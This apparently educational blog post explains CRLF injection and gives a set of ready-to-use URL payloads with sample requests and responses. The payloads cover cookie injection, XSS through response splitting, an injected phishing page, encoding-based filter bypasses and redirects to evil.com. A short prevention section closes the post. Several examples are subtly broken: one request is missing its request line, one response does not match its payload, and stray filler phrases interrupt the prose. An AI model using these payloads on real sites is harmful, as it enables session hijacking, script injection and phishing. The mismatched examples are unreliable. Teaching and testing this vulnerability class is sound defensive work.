Introduction:
CRLF injection is a type of attack that exploits vulnerabilities in web applications, an attacker allow to inject arbitrary HTTP headers and manipulate user inputs. This vulnerability can lead to a range of security issues, including cookie hijacking, session fixation, and even server-side request forgery.
In this blog post, we'll dive deeper into CRLF injection, its impact on web application security, and how to prevent it.
What is CRLF Injection?
CRLF stands for "Carriage Return Line Feed" and refers to the characters that are used to represent the end of a line in HTTP headers. CRLF injection is a technique that allows attackers to inject malicious characters into HTTP headers, enabling them to control the response sent by the web server. Let me tell you a range of attacks, including cookie poisoning, cache poisoning, and cross-site scripting (XSS).
Let us see the Example of CLRF Injection.
Normal Request:
GET / HTTP/1.1\r\n
Host: testphp.vulnweb.com\r\n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n
Accept-Language: en-US,en;q=0.5\r\n
Accept-Encoding: gzip, deflate\r\n
Referer: https://www.google.com/\r\n
Connection: keep-alive\r\n
Upgrade-Insecure-Requests: 1\r\n
Response:
HTTP/1.1 200 OK
Server: nginx/1.19.0
Date: Fri, 30 Sep 2022 11:55:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Content-Encoding: gzip
CRLF Request:
Host: testphp.vulnweb.com\r\n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n
Accept-Language: en-US,en;q=0.5\r\n
Accept-Encoding: gzip, deflate\r\n
Referer: https://www.google.com/\r\n
Connection: keep-alive\r\n
Upgrade-Insecure-Requests: 1\r\n
Response:
HTTP/1.1 200 OK
Server: nginx/1.19.0
Set-Cookie: CRFLInjection=Fas3c7
Date: Fri, 30 Sep 2022 11:55:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Content-Encoding: gzip
Payload: /%0d%0aSet-Cookie:CRLFInjection=Fas3c7
Let's Break the payload and understand.
%0d and %0a are encoded forms of \r and \n respectively.
1. Cookie Injection
Request:
http://testphp.vulnweb.com/%0d%0aSet-Cookie:FakeCookie=Fas3c7
Request:
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate
Referer: https://www.google.com/
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Server: nginx/1.19.0
Set-Cookie: FakeCookie=Fas3c7
Date: Fri, 30 Sep 2022 14:46:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Content-Encoding: gzip
HackerOne Reports:
Read more https://hackerone.com/hacktivity?order_direction=DESC&order_field=popular&filter=type%3Apublic&querystring=crlf%20injection
Request:
GET //%0ASet-Cookie:%20crlfinjetion=%20value%0A%0A<img src=x onerror=Prompt(1)> HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.google.com/
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Server: nginx/1.19.0
Set-Cookie: FakeCookie=Fas3c7
Date: Fri, 30 Sep 2022 14:46:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Content-Encoding: gzip
23
<svg onload=alert(document.domain)>
0
Requested page
http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e
Response:
HTTP/1.1 200 OK
Date: Tue, 20 Dec 2016 14:34:03 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 22907
Connection: close
X-Frame-Options: SAMEORIGIN
Last-Modified: Tue, 20 Dec 2016 11:50:50 GMT
ETag: "842fe-597b-54415a5c97a80"
Vary: Accept-Encoding
X-UA-Compatible: IE=edge
Server: NetDNA-cache/2.2
Link: <https://example.com/[INJECTION STARTS HERE]
Content-Length:35
X-XSS-Protection:0
23
<svg onload=alert(document.domain)>
0
CRLF - Write HTML
http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
Response:
Set-Cookie:en
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 27 Oct 2060 14:50:18 GMTp
Content-Length: 34
<html>You have been Phished</html>
CRLF - Filter Bypass
Using UTF-8 encoding
%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE
Reminder:
- %E5%98%8A = %0A = \u560a
- %E5%98%8D = %0D = \u560d
- %E5%98%BE = %3E = \u563e (>)
- %E5%98%BC = %3C = \u563c (<)
Try to search for parameters that lead to redirects and fuzz them
Redirect
- Basic payload
https://example.com/?lang=en%0D%0ALocation:%20https://evil.com/The response is
HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 09 May 2016 14:47:29 GMT
Set-Cookie: language=en
Location: https://evil.com/
- Double encode
https://example.com/?lang=en%250D%250ALocation:%20https://evil.com/
- Bypass Unicode
https://example.com/?lang=en%E5%98%8A%E5%98%8DLocation:%20https://evil.com/
Automation:
Cli Automation:
Impact of CRLF Injection:
The impact of CRLF injection can be significant, as it allows attackers to inject arbitrary headers, modify cookies, and redirect users to malicious websites. If an attacker is able to inject a "Location" header, they can redirect users to a phishing website or a site that installs malware. Let me tell you more CRLF injection can also be used to bypass security controls such as firewalls, allowing attackers to execute attacks that would otherwise be blocked.
Preventing CRLF Injection:
To prevent CRLF injection, it is essential to validate user input and filter output any characters that can be used for injection. This can be done by using input validation and sanitization techniques, as well as encoding user inputs before using them in HTTP headers. It is also important to follow secure coding practices and ensure that your web application is designed with security in mind. Regular vulnerability assessments and penetration testing can help identify any CRLF injection vulnerabilities and enable you to remediate them before they are exploited.
Conclusion:
CRLF injection is a serious security vulnerability that can have significant consequences for web application security. By understanding how CRLF injection works and implementing best practices for preventing it, let me tell you the web application developers and security professionals can help to ensure that their applications are secure and protect users from harm. Regular testing and vulnerability assessments can help to ensure that CRLF injection vulnerabilities are detected and remediated in a timely manner.
0 Comments
If you have any doubts. Please let me know